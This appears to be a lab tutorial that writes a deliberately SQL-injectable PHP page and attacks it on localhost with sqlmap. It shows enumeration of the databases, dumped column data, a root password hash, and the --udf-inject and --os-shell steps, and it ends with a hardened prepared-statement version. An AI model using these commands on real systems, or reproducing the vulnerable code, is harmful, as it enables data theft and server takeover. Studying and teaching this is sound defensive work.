SQL injection in practice with sqlmap

sqlmap is a fairly powerful open-source SQL injection tool written in Python. Today I wrote a page containing a SQL injection vulnerability and then used sqlmap to attack it, in order to study how SQL injection works and how sqlmap is used; in the process I also came to appreciate just how much damage SQL injection can do.

First, below is the simple PHP code with the SQL injection vulnerability that I wrote. As you can see from the code, it receives a gid parameter and, without applying any filtering to it, concatenates it straight into a SQL statement for the query, so SQL injection is inevitable.

<?php
// Deliberately vulnerable example: gid is taken from the request and
// concatenated straight into the query. (The mysql_* extension used here is
// deprecated and was removed in PHP 7; it is kept because this post targets it.)
$db = mysql_connect('127.0.0.1','root','123456');
mysql_select_db('auction', $db);
$result = mysql_query("set names 'utf8'");
$goodsid = $_GET['gid'];                                 // unvalidated user input
$query = "select * from sys_goods where gid<$goodsid";   // injection point
$result = mysql_query($query);
$num = mysql_num_rows($result);
for($i=0; $i<$num; $i++){
    $row = mysql_fetch_row($result);
    print_r($row);
}
?>

Now let's use sqlmap to inject, step by step.

./sqlmap.py -u "http://127.0.0.1/sqlmap.php?gid=100" --level=3 --smart --dbms "MySQL" --current-user
#get the name of the current database user

current user:    'root@localhost'

./sqlmap.py -u "http://127.0.0.1/sqlmap.php?gid=100" --level=3 --smart --dbms "MySQL" --current-db
#get the name of the current database

current database:    'auction'

./sqlmap.py -u "http://127.0.0.1/sqlmap.php?gid=100" --level=3 --smart --dbms "MySQL" --tables -D "auction"
#list the tables of a database

Database: auction
[2 tables]
+----------------+
| sys_goods      |
| sys_goods_type |
+----------------+

./sqlmap.py -u "http://127.0.0.1/sqlmap.php?gid=100" --level=3 --smart --dbms "MySQL" --columns -T "sys_goods" -D "auction"
#list the columns of a table

Database: auction
Table: sys_goods
[18 columns]
+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| cby         | int(10)      |
| g_ad        | varchar(128) |
| g_bid_user  | text         |
| g_calc_type | tinyint(4)   |
| g_content   | varchar(120) |
| g_end       | int(10)      |
| g_name      | varchar(200) |
| g_num       | int(10)      |
| g_number    | int(10)      |
| g_photo     | varchar(200) |
| g_price     | float(6,2)   |
| g_start     | int(10)      |
| g_status    | tinyint(4)   |
| g_text      | text         |
| g_type      | int(10)      |
| g_uptime    | int(10)      |
| gid         | int(10)      |
| mx_id       | int(10)      |
+-------------+--------------+

./sqlmap.py -u "http://127.0.0.1/sqlmap.php?gid=100" --level=3 --smart --dbms "MySQL" --dump -C "g_name" -T "sys_goods" -D "auction" -v 0
#dump the contents of a column

Database: auction
Table: sys_goods
[94 entries]
+-----------------------+
| g_name                |
+-----------------------+
| <blank>               |
| <blank>               |
| <blank>               |
| 020                   |
| 022                   |
| 1                     |
| 1                     |
| 1                     |
| 1.0                   |
| 11                    |
| 12                    |
| 12                    |
| 12                    |
| 12.                   |
....
....

./sqlmap.py -u "http://127.0.0.1/sqlmap.php?gid=100" --level=3 --smart --dbms "MySQL" --users
#list database users

database management system users [5]:
[*] ''@'localhost'
[*] ''@'localhost.domain'
[*] 'root'@'127.0.0.1'
[*] 'root'@'localhost'
[*] 'root'@'localhost.domain'

./sqlmap.py -u "http://127.0.0.1/sqlmap.php?gid=100" --level=3 --smart --dbms "MySQL" --dbs
#list databases

available databases [7]:
[*] auction
[*] django1
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[*] wp_blog

./sqlmap.py -u "http://127.0.0.1/sqlmap.php?gid=100" --level=3 --smart --dbms "MySQL" --passwords
#database user password hashes

database management system users password hashes:
[*]  [1]:
    password hash: NULL
[*] root [1]:
    password hash: *CF2C295FF917*735835*4920*EB24*ACFBC72E53

./sqlmap.py -u "http://127.0.0.1/sqlmap.php?gid=100" --level=3 --smart --dbms "MySQL" --privileges
#check privileges

[23:10:25] [INFO] fetching privileges for user '%root%'
[23:10:25] [INFO] retrieved: SELECT
[23:10:27] [INFO] retrieved: INSERT
[23:10:30] [INFO] retrieved: UPDATE
[23:10:32] [INFO] retrieved: DELETE
[23:10:34] [INFO] retrieved: CREATE
[23:10:36] [INFO] retrieved: DROP
...
...

./sqlmap.py -u "http://127.0.0.1/sqlmap.php?gid=100" --level=3 --smart --dbms "MySQL" --privileges -U root
#check the privileges of a specific user

./sqlmap.py -u "http://127.0.0.1/sqlmap.php?gid=100" --level=3 --smart --dbms "MySQL" --is-dba -v 1
#is the current user a database administrator?

[23:19:27] [INFO] testing if current user is DBA
[23:19:27] [INFO] fetching current user
[23:19:27] [INFO] resumed: root@localhost
current user is DBA:    True

./sqlmap.py -u "http://127.0.0.1/sqlmap.php?gid=100" --level=3 --smart --dbms "MySQL" --roles
#enumerate database user roles

./sqlmap.py -u "http://127.0.0.1/sqlmap.php?gid=100" --level=3 --smart --dbms "MySQL" --udf-inject
#inject user-defined functions (gets system-level access!)

./sqlmap.py -u "http://127.0.0.1/sqlmap.php?gid=100" --level=3 --smart --dbms "MySQL" --dump-all --exclude-sysdbs -v 0
#dump every table in all databases except the system ones

./sqlmap.py -u "http://127.0.0.1/sqlmap.php?gid=100" --level=3 --smart --dbms "MySQL" --sql-shell
#run SQL of your choice: it prompts you for a SQL statement, then you just follow the steps

./sqlmap.py -u "http://127.0.0.1/sqlmap.php?gid=100" --level=3 --smart --dbms "MySQL" --os-shell
#interactive operating-system shell

If you want to see exactly how sqlmap performs the injection, watch Apache's access log while it runs; the injection statements sqlmap submits show up there.
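For contrast with the vulnerable page above, here is the same query written the way it should have been, as an added example that is not the original post's code: gid is validated as an integer and bound through a prepared statement, and the page connects as a dedicated read-only account (the account name auction_ro and its password are assumptions) instead of the root user whose DBA privileges the --privileges and --is-dba output enumerated.

```php
<?php
// Added example (not the original post's code): hardened version of the page.
// The SQL text is fixed; user input only ever reaches the database as a bound
// integer parameter, so none of the payloads sqlmap sends are parsed as SQL.

// Connect as a least-privilege, read-only account instead of root. The account
// name and password here are assumptions; grant it only SELECT on
// auction.sys_goods, so that even a successful injection cannot dump other
// databases, read password hashes or load UDFs as the --privileges run showed.
$mysqli = new mysqli('127.0.0.1', 'auction_ro', 'CHANGE-ME', 'auction');
if ($mysqli->connect_errno) {
    http_response_code(500);
    exit('database unavailable');
}
$mysqli->set_charset('utf8');

// Reject anything that is not a non-negative integer before it gets near SQL.
// filter_input returns null when gid is absent and false when validation fails.
$gid = filter_input(INPUT_GET, 'gid', FILTER_VALIDATE_INT,
                    ['options' => ['min_range' => 0]]);
if ($gid === null || $gid === false) {
    http_response_code(400);
    exit('invalid gid');
}

// Prepared statement: the placeholder is bound with type 'i' (integer), so
// the value is never interpolated into the query string.
$stmt = $mysqli->prepare('SELECT gid, g_name, g_price FROM sys_goods WHERE gid < ?');
if ($stmt === false) {
    http_response_code(500);
    exit('query failed');
}
$stmt->bind_param('i', $gid);
$stmt->execute();
$stmt->bind_result($id, $name, $price);
while ($stmt->fetch()) {
    // Escape on output too: g_name is data that attackers may have influenced.
    printf("%d\t%s\t%.2f\n", $id, htmlspecialchars($name, ENT_QUOTES, 'UTF-8'), $price);
}
$stmt->close();
$mysqli->close();
```

Run the sqlmap commands above against this version and it finds no injectable parameter: every non-integer gid is answered with a 400 before any SQL is built.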